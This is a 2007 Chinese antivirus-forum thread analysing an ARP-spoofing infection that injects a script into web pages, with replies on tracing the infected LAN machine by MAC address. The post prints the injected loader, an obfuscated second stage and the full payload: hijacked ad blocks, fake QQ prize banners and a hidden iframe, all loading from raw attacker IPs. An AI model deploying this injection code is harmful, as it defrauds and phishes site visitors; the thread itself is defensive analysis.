查看: 2965|回复: 6
收起左侧

[已解决] ADS BY GOOGLE 新的ARP病毒 请问达人如何解决?

 关闭 [复制链接]
coral082 该用户已被删除
发表于 2007-12-2 01:27:33 | 显示全部楼层 |阅读模式
又一个ARP病毒,带GG广告和百万q币大放送的仿腾讯

最主要的特征是在网页第一行有<script src=http://121.11.245.180/1.js></script> 的脚本..
我们看一下具体的图





打开上边那个1.js,可以发现有经下内容
document.write(unescape(’%3Cscript%3E%0D%0A%0D%0Adocument.writeln%28%22%3Cscript%20type%3D%5C%22text%5C/javascript%5C%22%20src%20%3D%20%5C%22http%3A%5C/%5C/121.15.245.60%5C/oo.asp%5C%22%3E%3C%5C/script%3E%22%29%0D%0A%0D%0A%3C/script%3E’))
注意,还是unescape过的,我们解密一下,看到
document.write(unescape(’<script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/oo.asp\”><\/script>”)
</script>’))
我们打开http://121.15.245.60/oo.asp 可以看到源码是
<script src=http://121.11.245.180/1.js></script>
document.writeln(”<script type=\”text\/javascript\” src = \”http:\/\/121.15.245.60\/ooo.js\”><\/script>”)
上边那个我们见过了,看下边的..下载,打开
document.writeln(”<center>”);
window.onerror = function (){return true};
function hgbrand(a)
{
  return parseInt((a)*Math.random()+1);
}
function hgbvclosew(a,b)
{
  document.getElementById(a).location=’about:blank’;
  document.getElementById(b).innerHTML=”";
}

优文网络提醒您,上边这个innerHTML=”";用的是动态插入,所以你看到的广告或其他的是不同的..
var hgbnumTemp;
hgbnumTemp=hgbrand(6);

if (hgbnumTemp==1)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

if (hgbnumTemp==2)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”CC00FF\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”CC00FF\”;”);
document.writeln(”google_color_text = \”CC99FF\”;”);
document.writeln(”google_color_url = \”CC44FF\”;”);
document.writeln(”google_ui_features = \”rc:10\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

if (hgbnumTemp==3)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}


if (hgbnumTemp==4)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”9900CC\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”9900CC\”;”);
document.writeln(”google_color_text = \”CC97E6\”;”);
document.writeln(”google_color_url = \”9900CD\”;”);
document.writeln(”google_ui_features = \”rc:6\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)
}

if (hgbnumTemp==5)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)

///这几个是GG广告,发布者ID pub-6651899251830388, 不知是病毒作者的还是有意要陷害其他人的..
document.writeln(”<div id=\”adid\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/play.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/jq5.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadid1dfas23()\”,200);function runadid1dfas23(){document.all.adid.style.top=document.body.scrollTop+document.body.clientHeight-159;document.all.adid.style.left=document.body.scrollLeft +document.body.clientWidth-256}<\/script>”)
}

///这个就是下边那个仿QQ的代码..
if (hgbnumTemp==6)
{
document.writeln(”<script type=\”text\/javascript\”><!–”);
document.writeln(”google_ad_client = \”pub-6651899251830388\”;”);
document.writeln(”google_ad_width = 728;”);
document.writeln(”google_ad_height = 90;”);
document.writeln(”google_ad_format = \”728×90_as\”;”);
document.writeln(”google_ad_type = \”text\”;”);
document.writeln(”\/\/2007-10-22″);
document.writeln(”google_ad_channel = \”8570106281\”;”);
document.writeln(”google_color_border = \”72179D\”;”);
document.writeln(”google_color_bg = \”FFFFFF\”;”);
document.writeln(”google_color_link = \”72179D\”;”);
document.writeln(”google_color_text = \”6C82B5\”;”);
document.writeln(”google_color_url = \”6131BD\”;”);
document.writeln(”\/\/–>”);
document.writeln(”<\/script>”);
document.writeln(”<script type=\”text\/javascript\”");
document.writeln(”  src=\”http:\/\/pagead2.googlesyndication.com\/pagead\/show_ads.js\”>”);
document.writeln(”<\/script>”)

///这个也是GG广告,同上
document.writeln(”<div id=\”adidd\” style=\”position:absolute;bottom:0px;right:0px;background-color:#ffffff\”><a href=\”http:\/\/121.15.245.60\/qq.html\” target=\”_blank\”><img src=\”http:\/\/121.15.245.60\/qq\/qq2.gif\” border=\”0\”><\/a><\/div>”);
document.writeln(”<script>setInterval(\”runadidd1dfas23()\”,200);function runadidd1dfas23(){document.all.adidd.style.top=document.body.scrollTop+document.body.clientHeight-138;document.all.adidd.style.left=document.body.scrollLeft +document.body.clientWidth-209}<\/script>”)
}

///这个也是下边那个仿QQ的代码..
document.writeln(”<iframe src=\”http:\/\/w.c0mo.com\/1.htm\” width=\”0\” height=\”0\”><\/iframe>”);
document.writeln(”</center>”);

注意上边这个ifame,打开,原来是个统计代码,这病毒作者也是分析专家呀..代码如下
<script src=’http://s119.cnzz.com/stat.php?id=675882&amp;web_id=675882&show=pic1′ language=’JavaScript’ charset=’gb2312′></script>
以上就是代码的具体分析
coral082 该用户已被删除
 楼主| 发表于 2007-12-2 01:28:30 | 显示全部楼层
我这个出现了两天了 不知道怎么弄
上面的帖子是从360的论坛上转过来的
希望达人们能够解决
msconfig
发表于 2007-12-2 08:27:13 | 显示全部楼层
找到局域网里的毒机才是王道
Pastime
发表于 2007-12-2 08:57:32 | 显示全部楼层
  控制自己的鼠标 汗
command
发表于 2007-12-2 09:13:07 | 显示全部楼层
太强了,我一点都看不懂。
coral082 该用户已被删除
 楼主| 发表于 2007-12-3 11:18:58 | 显示全部楼层
顶上去
【超超】
发表于 2007-12-3 11:53:43 | 显示全部楼层
找到局域网内的带毒机器

在CMD中打ARP -R
察看被攻击电脑上连接进程,然后不要记录上面的IP地质,而是要记录上面的MAC地址
因为IP有可能是病毒伪造的
然后再多看几台电脑,是不是有相同的MAC地址

然后也可以使用CMD下打ARP -D清楚记录然后过五分钟后再打ARP -R察看那几台连接了
然后通过MAC地址去找出毒机
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-26 09:05 , Processed in 0.137632 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表